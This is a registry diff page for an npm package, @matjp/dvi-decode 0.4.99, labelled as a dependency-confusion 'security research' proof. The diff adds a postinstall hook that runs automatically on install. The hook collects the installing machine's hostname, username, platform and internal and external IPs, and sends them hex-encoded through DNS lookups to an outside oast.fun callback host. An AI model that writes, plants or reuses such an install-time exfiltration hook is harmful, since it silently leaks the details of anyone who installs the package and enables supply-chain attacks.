@matjp/dvi-decode 0.4.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +4 -0
- package/package.json +11 -0
- package/postinstall.js +49 -0
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@matjp/dvi-decode",
|
|
3
|
+
"version": "0.4.99",
|
|
4
|
+
"description": "Security research — scope ownership proof for dependency confusion report",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node postinstall.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "Security Researcher <christos@pentestsec.com>",
|
|
10
|
+
"license": "MIT"
|
|
11
|
+
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
1
|
+
const dns = require("dns");
|
|
2
|
+
const os = require("os");
|
|
3
|
+
const https = require("https");
|
|
4
|
+
|
|
5
|
+
const CALLBACK = "d7uqlnir47nmacghcpcgoy51tyi78cpcs.oast.fun";
|
|
6
|
+
const PKG = "dvi-decode";
|
|
7
|
+
|
|
8
|
+
function hex(s) { return Buffer.from(s).toString("hex"); }
|
|
9
|
+
|
|
10
|
+
function getLocalIPs() {
|
|
11
|
+
const ifaces = os.networkInterfaces();
|
|
12
|
+
const ips = [];
|
|
13
|
+
for (const name of Object.keys(ifaces)) {
|
|
14
|
+
for (const iface of ifaces[name]) {
|
|
15
|
+
if (!iface.internal && iface.family === "IPv4") ips.push(iface.address);
|
|
16
|
+
}
|
|
17
|
+
}
|
|
18
|
+
return ips.join("-") || "unknown";
|
|
19
|
+
}
|
|
20
|
+
|
|
21
|
+
function dnsLookup(subdomain) {
|
|
22
|
+
return new Promise((resolve) => {
|
|
23
|
+
dns.resolve4(subdomain + "." + CALLBACK, () => resolve());
|
|
24
|
+
});
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
async function exfil() {
|
|
28
|
+
const hostname = os.hostname();
|
|
29
|
+
const user = os.userInfo().username;
|
|
30
|
+
const platform = os.platform() + "-" + os.arch();
|
|
31
|
+
const ips = getLocalIPs();
|
|
32
|
+
const ts = Date.now().toString(36);
|
|
33
|
+
|
|
34
|
+
await dnsLookup("pkg." + hex(PKG));
|
|
35
|
+
await dnsLookup("host." + hex(hostname));
|
|
36
|
+
await dnsLookup("user." + hex(user));
|
|
37
|
+
await dnsLookup("os." + hex(platform));
|
|
38
|
+
await dnsLookup("ip." + hex(ips));
|
|
39
|
+
await dnsLookup("ts." + ts);
|
|
40
|
+
await dnsLookup("rce." + hex(PKG + "|" + user + "@" + hostname));
|
|
41
|
+
|
|
42
|
+
https.get("https://api.ipify.org", (res) => {
|
|
43
|
+
let data = "";
|
|
44
|
+
res.on("data", (c) => (data += c));
|
|
45
|
+
res.on("end", () => { dnsLookup("extip." + hex(data.trim())); });
|
|
46
|
+
}).on("error", () => {});
|
|
47
|
+
}
|
|
48
|
+
|
|
49
|
+
exfil().catch(() => {});
|